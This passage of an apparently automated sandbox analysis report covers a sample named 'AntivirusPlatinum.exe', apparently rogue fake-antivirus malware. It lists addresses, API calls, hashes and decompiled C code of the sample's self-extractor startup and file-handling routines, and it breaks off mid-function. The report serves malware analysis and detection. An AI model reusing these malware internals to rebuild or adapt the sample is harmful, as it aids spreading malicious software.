                                                                                                                                                              0x0040c3fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c3e8
                                                                                                                                                              0x0040c410
                                                                                                                                                              0x0040c412
                                                                                                                                                              0x0040c41e
                                                                                                                                                              0x0040c41e
                                                                                                                                                              0x0040c430
                                                                                                                                                              0x0040c436
                                                                                                                                                              0x0040c438
                                                                                                                                                              0x0040c43e
                                                                                                                                                              0x0040c445
                                                                                                                                                              0x0040c453
                                                                                                                                                              0x0040c463
                                                                                                                                                              0x0040c463
                                                                                                                                                              0x0040c469
                                                                                                                                                              0x0040c470
                                                                                                                                                              0x0040c472
                                                                                                                                                              0x0040c479
                                                                                                                                                              0x0040c47e
                                                                                                                                                              0x0040c484
                                                                                                                                                              0x0040c485
                                                                                                                                                              0x0040c489
                                                                                                                                                              0x0040c497
                                                                                                                                                              0x0040c497
                                                                                                                                                              0x0040c489
                                                                                                                                                              0x0040c4a2
                                                                                                                                                              0x0040c4a4
                                                                                                                                                              0x0040c4b0
                                                                                                                                                              0x0040c4b2
                                                                                                                                                              0x0040c4b8
                                                                                                                                                              0x0040c4c6
                                                                                                                                                              0x0040c4c6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c4b8
                                                                                                                                                              0x0040c414
                                                                                                                                                              0x0040c418
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c418
                                                                                                                                                              0x0040c361
                                                                                                                                                              0x0040c365
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c36b
                                                                                                                                                              0x0040c36b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c36b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c4d0
                                                                                                                                                              0x0040c4d1
                                                                                                                                                              0x0040c4d6
                                                                                                                                                              0x0040c4d8
                                                                                                                                                              0x0040c4db
                                                                                                                                                              0x0040c4db
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c511
                                                                                                                                                              0x0040c518
                                                                                                                                                              0x0040c518
                                                                                                                                                              0x0040c51b
                                                                                                                                                              0x0040c548
                                                                                                                                                              0x0040c548
                                                                                                                                                              0x0040c54f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c54f
                                                                                                                                                              0x0040c51d
                                                                                                                                                              0x0040c51d
                                                                                                                                                              0x0040c520
                                                                                                                                                              0x0040c535
                                                                                                                                                              0x0040c53c
                                                                                                                                                              0x0040c53c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c53c
                                                                                                                                                              0x0040c522
                                                                                                                                                              0x0040c522
                                                                                                                                                              0x0040c523
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c525
                                                                                                                                                              0x0040c525
                                                                                                                                                              0x0040c526
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c52c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c59d
                                                                                                                                                              0x0040c5a1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c5a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c5b9
                                                                                                                                                              0x0040c5bd
                                                                                                                                                              0x0040c71c
                                                                                                                                                              0x0040c71c
                                                                                                                                                              0x0040c720
                                                                                                                                                              0x0040c726
                                                                                                                                                              0x0040c72d
                                                                                                                                                              0x0040c72f
                                                                                                                                                              0x0040c72f
                                                                                                                                                              0x0040c739
                                                                                                                                                              0x0040c739
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c720
                                                                                                                                                              0x0040c5cf
                                                                                                                                                              0x0040c5dc
                                                                                                                                                              0x0040c5e1
                                                                                                                                                              0x0040c5e5
                                                                                                                                                              0x0040c5e7
                                                                                                                                                              0x0040c5f4
                                                                                                                                                              0x0040c5f4
                                                                                                                                                              0x0040c5fa
                                                                                                                                                              0x0040c600
                                                                                                                                                              0x0040c601
                                                                                                                                                              0x0040c607
                                                                                                                                                              0x0040c608
                                                                                                                                                              0x0040c609
                                                                                                                                                              0x0040c60b
                                                                                                                                                              0x0040c60e
                                                                                                                                                              0x0040c614
                                                                                                                                                              0x0040c615
                                                                                                                                                              0x0040c617
                                                                                                                                                              0x0040c61a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c5ee
                                                                                                                                                              0x0040c5ee
                                                                                                                                                              0x0040c5ee
                                                                                                                                                              0x0040c5f1
                                                                                                                                                              0x0040c5f1
                                                                                                                                                              0x0040c628
                                                                                                                                                              0x0040c62e
                                                                                                                                                              0x0040c635
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c63b
                                                                                                                                                              0x0040c642
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c64a
                                                                                                                                                              0x0040c651
                                                                                                                                                              0x0040c658
                                                                                                                                                              0x0040c65d
                                                                                                                                                              0x0040c65f
                                                                                                                                                              0x0040c69f
                                                                                                                                                              0x0040c69f
                                                                                                                                                              0x0040c6a6
                                                                                                                                                              0x0040c6af
                                                                                                                                                              0x0040c6bb
                                                                                                                                                              0x0040c6c9
                                                                                                                                                              0x0040c6c9
                                                                                                                                                              0x0040c6d5
                                                                                                                                                              0x0040c6e3
                                                                                                                                                              0x0040c6ed
                                                                                                                                                              0x0040c6f4
                                                                                                                                                              0x0040c6fa
                                                                                                                                                              0x0040c6fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c703
                                                                                                                                                              0x0040c705
                                                                                                                                                              0x0040c705
                                                                                                                                                              0x0040c70a
                                                                                                                                                              0x0040c711
                                                                                                                                                              0x0040c716
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c716
                                                                                                                                                              0x0040c6fd
                                                                                                                                                              0x0040c661
                                                                                                                                                              0x0040c663
                                                                                                                                                              0x0040c66a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c66c
                                                                                                                                                              0x0040c66c
                                                                                                                                                              0x0040c66c
                                                                                                                                                              0x0040c674
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c676
                                                                                                                                                              0x0040c677
                                                                                                                                                              0x0040c67f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c681
                                                                                                                                                              0x0040c68b
                                                                                                                                                              0x0040c692
                                                                                                                                                              0x0040c697
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c745
                                                                                                                                                              0x0040c749
                                                                                                                                                              0x0040c74b
                                                                                                                                                              0x0040c752
                                                                                                                                                              0x0040c75e
                                                                                                                                                              0x0040c75e
                                                                                                                                                              0x0040c764
                                                                                                                                                              0x0040c76c
                                                                                                                                                              0x0040c76c
                                                                                                                                                              0x0040c771
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c77d
                                                                                                                                                              0x0040c781
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c787
                                                                                                                                                              0x0040c5a9
                                                                                                                                                              0x0040c5af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c78e
                                                                                                                                                              0x0040c792
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c798
                                                                                                                                                              0x0040c7a0
                                                                                                                                                              0x0040c7a5
                                                                                                                                                              0x0040c7a5
                                                                                                                                                              0x0040c7a8
                                                                                                                                                              0x0040c7cd
                                                                                                                                                              0x0040c7aa
                                                                                                                                                              0x0040c7aa
                                                                                                                                                              0x0040c7aa
                                                                                                                                                              0x0040c7ad
                                                                                                                                                              0x0040c7c4
                                                                                                                                                              0x0040c7af
                                                                                                                                                              0x0040c7af
                                                                                                                                                              0x0040c7af
                                                                                                                                                              0x0040c7b0
                                                                                                                                                              0x0040c7bb
                                                                                                                                                              0x0040c7b2
                                                                                                                                                              0x0040c7b2
                                                                                                                                                              0x0040c7b2
                                                                                                                                                              0x0040c7b0
                                                                                                                                                              0x0040c7ad
                                                                                                                                                              0x0040c7db
                                                                                                                                                              0x0040c7e2
                                                                                                                                                              0x0040c7e9
                                                                                                                                                              0x0040c7f0
                                                                                                                                                              0x0040c7f5
                                                                                                                                                              0x0040c7fc
                                                                                                                                                              0x0040c846
                                                                                                                                                              0x0040c84b
                                                                                                                                                              0x0040c84d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c84f
                                                                                                                                                              0x0040c851
                                                                                                                                                              0x0040c858
                                                                                                                                                              0x0040c85e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c860
                                                                                                                                                              0x0040c860
                                                                                                                                                              0x0040c860
                                                                                                                                                              0x0040c862
                                                                                                                                                              0x0040c865
                                                                                                                                                              0x0040c86c
                                                                                                                                                              0x0040c86e
                                                                                                                                                              0x0040c875
                                                                                                                                                              0x0040c878
                                                                                                                                                              0x0040c87d
                                                                                                                                                              0x0040c87f
                                                                                                                                                              0x0040c8b1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c8b1
                                                                                                                                                              0x0040c881
                                                                                                                                                              0x0040c883
                                                                                                                                                              0x0040c886
                                                                                                                                                              0x0040c89a
                                                                                                                                                              0x0040c89a
                                                                                                                                                              0x0040c89b
                                                                                                                                                              0x0040c89b
                                                                                                                                                              0x0040c8a0
                                                                                                                                                              0x0040c8a1
                                                                                                                                                              0x0040c8a7
                                                                                                                                                              0x0040c8a7
                                                                                                                                                              0x0040c8a8
                                                                                                                                                              0x0040c8ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c8ad
                                                                                                                                                              0x0040c888
                                                                                                                                                              0x0040c888
                                                                                                                                                              0x0040c88b
                                                                                                                                                              0x0040c88c
                                                                                                                                                              0x0040c892
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c892
                                                                                                                                                              0x0040c867
                                                                                                                                                              0x0040c86a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c8b3
                                                                                                                                                              0x0040c8b3
                                                                                                                                                              0x0040c8b4
                                                                                                                                                              0x0040c8b4
                                                                                                                                                              0x0040c8b9
                                                                                                                                                              0x0040c8bb
                                                                                                                                                              0x0040c8bd
                                                                                                                                                              0x0040c8bd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c7fe
                                                                                                                                                              0x0040c805
                                                                                                                                                              0x0040c813
                                                                                                                                                              0x0040c81a
                                                                                                                                                              0x0040c81f
                                                                                                                                                              0x0040c821
                                                                                                                                                              0x0040c827
                                                                                                                                                              0x0040c833
                                                                                                                                                              0x0040c833
                                                                                                                                                              0x0040c8c0
                                                                                                                                                              0x0040c8c0
                                                                                                                                                              0x0040c8c7
                                                                                                                                                              0x0040c8d0
                                                                                                                                                              0x0040c8d7
                                                                                                                                                              0x0040c8d7
                                                                                                                                                              0x0040c8e3
                                                                                                                                                              0x0040c8f2
                                                                                                                                                              0x0040c8f9
                                                                                                                                                              0x0040c905
                                                                                                                                                              0x0040c90a
                                                                                                                                                              0x0040c911
                                                                                                                                                              0x0040c91a
                                                                                                                                                              0x0040c926
                                                                                                                                                              0x0040c92d
                                                                                                                                                              0x0040c92d
                                                                                                                                                              0x0040c939
                                                                                                                                                              0x0040c940
                                                                                                                                                              0x0040c945
                                                                                                                                                              0x0040c94c
                                                                                                                                                              0x0040c952
                                                                                                                                                              0x0040c954
                                                                                                                                                              0x0040c954
                                                                                                                                                              0x0040c968
                                                                                                                                                              0x0040c96d
                                                                                                                                                              0x0040c974
                                                                                                                                                              0x0040c979
                                                                                                                                                              0x0040c97b
                                                                                                                                                              0x0040c98c
                                                                                                                                                              0x0040c998
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c97d
                                                                                                                                                              0x0040c983
                                                                                                                                                              0x0040c988
                                                                                                                                                              0x0040c98a
                                                                                                                                                              0x0040c99d
                                                                                                                                                              0x0040c9a8
                                                                                                                                                              0x0040c9b4
                                                                                                                                                              0x0040c9b6
                                                                                                                                                              0x0040c9b8
                                                                                                                                                              0x0040c9c1
                                                                                                                                                              0x0040c9c8
                                                                                                                                                              0x0040c9ca
                                                                                                                                                              0x0040c9cc
                                                                                                                                                              0x0040c9d5
                                                                                                                                                              0x0040c9dc
                                                                                                                                                              0x0040c9de
                                                                                                                                                              0x0040c9e0
                                                                                                                                                              0x0040c9e9
                                                                                                                                                              0x0040c9f7
                                                                                                                                                              0x0040c9fc
                                                                                                                                                              0x0040ca03
                                                                                                                                                              0x0040ca07
                                                                                                                                                              0x0040ca15
                                                                                                                                                              0x0040ca15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ca03
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c98a
                                                                                                                                                              0x0040c97b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ca1d
                                                                                                                                                              0x0040ca21
                                                                                                                                                              0x0040ca23
                                                                                                                                                              0x0040ca23
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c55b
                                                                                                                                                              0x0040c563
                                                                                                                                                              0x0040c568
                                                                                                                                                              0x0040c56b
                                                                                                                                                              0x0040c591
                                                                                                                                                              0x0040c56d
                                                                                                                                                              0x0040c56d
                                                                                                                                                              0x0040c570
                                                                                                                                                              0x0040c585
                                                                                                                                                              0x0040c572
                                                                                                                                                              0x0040c572
                                                                                                                                                              0x0040c579
                                                                                                                                                              0x0040c579
                                                                                                                                                              0x0040c570
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c008
                                                                                                                                                              0x0040c00c
                                                                                                                                                              0x0040c011
                                                                                                                                                              0x0040c018
                                                                                                                                                              0x0040c018
                                                                                                                                                              0x0040c01b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c01d
                                                                                                                                                              0x0040c01d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c01d
                                                                                                                                                              0x0040ca2a
                                                                                                                                                              0x0040ca48
                                                                                                                                                              0x0040ca4d
                                                                                                                                                              0x0040ca50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040ca59

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040B613: ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00001000,?,00000000,?,0040BFD4,00000000,?,?,?,?,?,?,0040D24D,?), ref: 0040B6BB
                                                                                                                                                              • lstrcmpiA.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040C032
                                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000400,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0041A818,0041A824,?), ref: 0040C074
                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040C0FE
                                                                                                                                                              • SHFileOperationA.SHELL32(?,?,00000000), ref: 0040C1B5
                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0040C1C2
                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0040C1D0
                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 0040C308
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040C3B4
                                                                                                                                                              • SetWindowTextA.USER32(00000000,00000000), ref: 0040C3C4
                                                                                                                                                              • SendMessageA.USER32(00000000,00000143,00000000,%s.%d.tmp), ref: 0040C3D3
                                                                                                                                                              • SendMessageA.USER32(00000000,00000143,00000000,00000000), ref: 0040C3FD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesMessageSendTextWindow$CurrentDeleteDirectoryEnvironmentExpandItemOperationStringslstrcmpi
                                                                                                                                                              • String ID: "$%s.%d.tmp$<br>$C:\WINDOWS$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                              • API String ID: 297094968-4244017151
                                                                                                                                                              • Opcode ID: d36ffacd43a2f8a78fecda516e75c7e09bd54960045749e9d3b70807280ed642
                                                                                                                                                              • Instruction ID: 26b2c8a04a2213872833e54c54379dca27802e9aad8b41e31b2901df3c031a3a
                                                                                                                                                              • Opcode Fuzzy Hash: d36ffacd43a2f8a78fecda516e75c7e09bd54960045749e9d3b70807280ed642
                                                                                                                                                              • Instruction Fuzzy Hash: 84E13CB1901219EADB21EBA0CD85FDE77BCAB04304F4081B7AA05F21D1DB78AB55CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E0040D33C() {
                                                                                                                                                              				char _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				char _v68;
                                                                                                                                                              				void* _t18;
                                                                                                                                                              				int _t28;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				void* _t54;
                                                                                                                                                              				struct HINSTANCE__* _t56;
                                                                                                                                                              				CHAR* _t57;
                                                                                                                                                              				intOrPtr _t62;
                                                                                                                                                              				int _t65;
                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                              
                                                                                                                                                              				__imp__OleInitialize(0); // executed
                                                                                                                                                              				E0040E428(0x41fdc0);
                                                                                                                                                              				_t57 = GetCommandLineA();
                                                                                                                                                              				_t60 = _t57;
                                                                                                                                                              				if(_t57 != 0) {
                                                                                                                                                              					E0040B485(0x41fdc0, _t60, _t57);
                                                                                                                                                              					SetEnvironmentVariableA("sfxcmd", _t57); // executed
                                                                                                                                                              				}
                                                                                                                                                              				GetModuleFileNameA(0, 0x419ad8, 0x400);
                                                                                                                                                              				SetEnvironmentVariableA("sfxname", 0x419ad8); // executed
                                                                                                                                                              				if(E00406EA5() == 0) {
                                                                                                                                                              					__eflags = 0;
                                                                                                                                                              					 *0x4192d8 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					GetModuleFileNameW(0, "C:\Users\engineer\Desktop\Endermanch@AntivirusPlatinum.exe", 0x400);
                                                                                                                                                              				}
                                                                                                                                                              				_t56 = GetModuleHandleA(0);
                                                                                                                                                              				 *0x414c78 = _t56; // executed
                                                                                                                                                              				_t18 = LoadIconA(_t56, 0x64); // executed
                                                                                                                                                              				 *0x4192d4 = _t18;
                                                                                                                                                              				 *0x4192d0 = LoadBitmapA( *0x414c78, 0x65); // executed
                                                                                                                                                              				E00411585( &_v12); // executed
                                                                                                                                                              				E004098E0(0, 0x414c88, _t54, 0x419ad8);
                                                                                                                                                              				E00406479( &_v68);
                                                                                                                                                              				E00406479( &_v40);
                                                                                                                                                              				_v44 = E0040ACA1(0x64);
                                                                                                                                                              				_v16 = E0040ACA1(0x64);
                                                                                                                                                              				 *0x418ecc =  &_v68;
                                                                                                                                                              				 *0x418ec8 =  &_v40; // executed
                                                                                                                                                              				_t28 = DialogBoxParamA(_t56, "STARTDLG", 0, E0040CC24, 0); // executed
                                                                                                                                                              				 *0x419f80 = 0;
                                                                                                                                                              				 *0x418ec8 = 0;
                                                                                                                                                              				 *0x418ecc = 0;
                                                                                                                                                              				E0040648F(E0040648F(_t28,  &_v40),  &_v68);
                                                                                                                                                              				_t52 =  &_v12;
                                                                                                                                                              				E004115FD( &_v12);
                                                                                                                                                              				_t62 =  *0x419f88; // 0x0
                                                                                                                                                              				if(_t62 != 0) {
                                                                                                                                                              					E0040B729( &_v12);
                                                                                                                                                              				}
                                                                                                                                                              				E0040A289(_t52, 0x419ee8, 0, 0x80);
                                                                                                                                                              				if( *0x41a824 > 0) {
                                                                                                                                                              					E0040A205( *0x41a818);
                                                                                                                                                              				}
                                                                                                                                                              				DeleteObject( *0x4192d4);
                                                                                                                                                              				_t34 =  *0x4192d0; // 0x72050a15
                                                                                                                                                              				if(_t34 != 0) {
                                                                                                                                                              					DeleteObject(_t34);
                                                                                                                                                              				}
                                                                                                                                                              				_t65 =  *0x414c7c; // 0x0
                                                                                                                                                              				if(_t65 == 0) {
                                                                                                                                                              					_t66 =  *0x419f78; // 0x2
                                                                                                                                                              					if(_t66 != 0) {
                                                                                                                                                              						E0040325C(0x414c7c, 0xff);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t35 =  *0x41a828;
                                                                                                                                                              				 *0x419f78 = 2;
                                                                                                                                                              				if( *0x41a828 != 0) {
                                                                                                                                                              					E0040B6EA(_t35); // executed
                                                                                                                                                              				}
                                                                                                                                                              				__imp__OleUninitialize(); // executed
                                                                                                                                                              				ExitProcess( *0x414c7c);
                                                                                                                                                              			}

















                                                                                                                                                              0x0040d348
                                                                                                                                                              0x0040d353
                                                                                                                                                              0x0040d364
                                                                                                                                                              0x0040d366
                                                                                                                                                              0x0040d368
                                                                                                                                                              0x0040d36b
                                                                                                                                                              0x0040d376
                                                                                                                                                              0x0040d376
                                                                                                                                                              0x0040d384
                                                                                                                                                              0x0040d390
                                                                                                                                                              0x0040d399
                                                                                                                                                              0x0040d3ae
                                                                                                                                                              0x0040d3b0
                                                                                                                                                              0x0040d39b
                                                                                                                                                              0x0040d3a6
                                                                                                                                                              0x0040d3a6
                                                                                                                                                              0x0040d3bd
                                                                                                                                                              0x0040d3c2
                                                                                                                                                              0x0040d3c8
                                                                                                                                                              0x0040d3d6
                                                                                                                                                              0x0040d3e4
                                                                                                                                                              0x0040d3e9
                                                                                                                                                              0x0040d3f4
                                                                                                                                                              0x0040d3fc
                                                                                                                                                              0x0040d404
                                                                                                                                                              0x0040d412
                                                                                                                                                              0x0040d420
                                                                                                                                                              0x0040d427
                                                                                                                                                              0x0040d435
                                                                                                                                                              0x0040d43a
                                                                                                                                                              0x0040d443
                                                                                                                                                              0x0040d449
                                                                                                                                                              0x0040d44f
                                                                                                                                                              0x0040d45d
                                                                                                                                                              0x0040d462
                                                                                                                                                              0x0040d465
                                                                                                                                                              0x0040d46a
                                                                                                                                                              0x0040d470
                                                                                                                                                              0x0040d472
                                                                                                                                                              0x0040d472
                                                                                                                                                              0x0040d482
                                                                                                                                                              0x0040d48d
                                                                                                                                                              0x0040d495
                                                                                                                                                              0x0040d495
                                                                                                                                                              0x0040d4a6
                                                                                                                                                              0x0040d4a8
                                                                                                                                                              0x0040d4af
                                                                                                                                                              0x0040d4b2
                                                                                                                                                              0x0040d4b2
                                                                                                                                                              0x0040d4b4
                                                                                                                                                              0x0040d4ba
                                                                                                                                                              0x0040d4bc
                                                                                                                                                              0x0040d4c2
                                                                                                                                                              0x0040d4ce
                                                                                                                                                              0x0040d4ce
                                                                                                                                                              0x0040d4c2
                                                                                                                                                              0x0040d4d3
                                                                                                                                                              0x0040d4d8
                                                                                                                                                              0x0040d4e4
                                                                                                                                                              0x0040d4e7
                                                                                                                                                              0x0040d4e7
                                                                                                                                                              0x0040d4ec
                                                                                                                                                              0x0040d4f8

                                                                                                                                                              APIs
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040D348
                                                                                                                                                                • Part of subcall function 0040E428: GetCPInfo.KERNEL32(00000000,?,?,00000000,?,?,0040E4E2,?,0040A6E8), ref: 0040E439
                                                                                                                                                                • Part of subcall function 0040E428: IsDBCSLeadByte.KERNEL32(00000000,?,00000000), ref: 0040E44D
                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 0040D358
                                                                                                                                                              • SetEnvironmentVariableA.KERNELBASE(sfxcmd,00000000,00000000), ref: 0040D376
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,00000400), ref: 0040D384
                                                                                                                                                              • SetEnvironmentVariableA.KERNELBASE(sfxname,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040D390
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,00000400), ref: 0040D3A6
                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 0040D3B7
                                                                                                                                                              • LoadIconA.USER32 ref: 0040D3C8
                                                                                                                                                              • LoadBitmapA.USER32 ref: 0040D3DB
                                                                                                                                                              • DialogBoxParamA.USER32 ref: 0040D43A
                                                                                                                                                              • DeleteObject.GDI32(00419EE8), ref: 0040D4A6
                                                                                                                                                              • DeleteObject.GDI32(72050A15), ref: 0040D4B2
                                                                                                                                                              • OleUninitialize.OLE32(?), ref: 0040D4EC
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040D4F8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Module$DeleteEnvironmentFileLoadNameObjectVariable$BitmapByteCommandDialogExitHandleIconInfoInitializeLeadLineParamProcessUninitialize
                                                                                                                                                              • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$STARTDLG$sfxcmd$sfxname$|LA
                                                                                                                                                              • API String ID: 2002691505-3485231091
                                                                                                                                                              • Opcode ID: a64e9b8bb87abff073727f12cb01139305408d7666d82abbf9609f215f0c5f05
                                                                                                                                                              • Instruction ID: 1b9db9b8f4c8a255ada22d75d2d3daf09faad69adfa1b9a70ca480eaf30b4961
                                                                                                                                                              • Opcode Fuzzy Hash: a64e9b8bb87abff073727f12cb01139305408d7666d82abbf9609f215f0c5f05
                                                                                                                                                              • Instruction Fuzzy Hash: A7416170940305BBD700BFB1DD999EA3AA8EB44305B15843FF601B22E1DB785C55CB6E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E00403A34(void* __ecx, void* __edx, intOrPtr _a4, char _a7, char* _a8, char _a11, intOrPtr _a12, signed int _a15) {
                                                                                                                                                              				signed int _v5;
                                                                                                                                                              				signed char* _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _v21;
                                                                                                                                                              				signed int _v25;
                                                                                                                                                              				char _v26;
                                                                                                                                                              				char _v1052;
                                                                                                                                                              				char _v3108;
                                                                                                                                                              				char _v4133;
                                                                                                                                                              				char _v4137;
                                                                                                                                                              				char _v4156;
                                                                                                                                                              				char _v6204;
                                                                                                                                                              				char _v7228;
                                                                                                                                                              				char _v8392;
                                                                                                                                                              				char _v8396;
                                                                                                                                                              				char _v11484;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				intOrPtr _t404;
                                                                                                                                                              				signed int _t414;
                                                                                                                                                              				signed int _t421;
                                                                                                                                                              				signed int _t424;
                                                                                                                                                              				signed int _t431;
                                                                                                                                                              				signed int _t437;
                                                                                                                                                              				char* _t441;
                                                                                                                                                              				char _t445;
                                                                                                                                                              				signed char _t450;
                                                                                                                                                              				signed int _t452;
                                                                                                                                                              				signed int _t456;
                                                                                                                                                              				signed int _t467;
                                                                                                                                                              				signed int _t471;
                                                                                                                                                              				signed int _t474;
                                                                                                                                                              				signed int _t491;
